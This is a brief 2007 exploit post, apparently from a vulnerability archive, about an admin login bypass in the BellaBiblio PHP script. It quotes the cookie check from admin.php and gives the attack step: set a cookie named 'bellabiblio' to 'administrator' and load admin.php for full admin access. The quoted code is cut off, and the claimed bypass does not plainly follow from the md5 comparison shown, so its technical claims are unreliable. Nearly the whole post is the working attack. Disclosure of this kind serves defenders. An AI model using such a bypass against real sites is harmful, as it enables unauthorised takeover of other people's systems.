Home / os / blackberry
bellabiblio-bypass.txt
Posted on 31 July 2007
BellaBiblio Admin Login Bypass SCRIPT: BellaBiblio DOWNLOAD: http://www.jemjabella.co.uk/scripts/BellaBiblio.zip AUTHOR: ilker kandemir <ilkerkandemir[at]mynet.com> Bug in;(admin.php) if (isset($_COOKIE['bellabiblio'])) { if ($_COOKIE['bellabiblio'] == md5($admin_name.$admin_pass.$secret)) { if (isset($_GET['ap'])) $page = $_GET['ap']; else $page = ""; EXPLOIT: Set your cookie: bellabiblio=administrator http:/site.com/admin.php And you have full admin access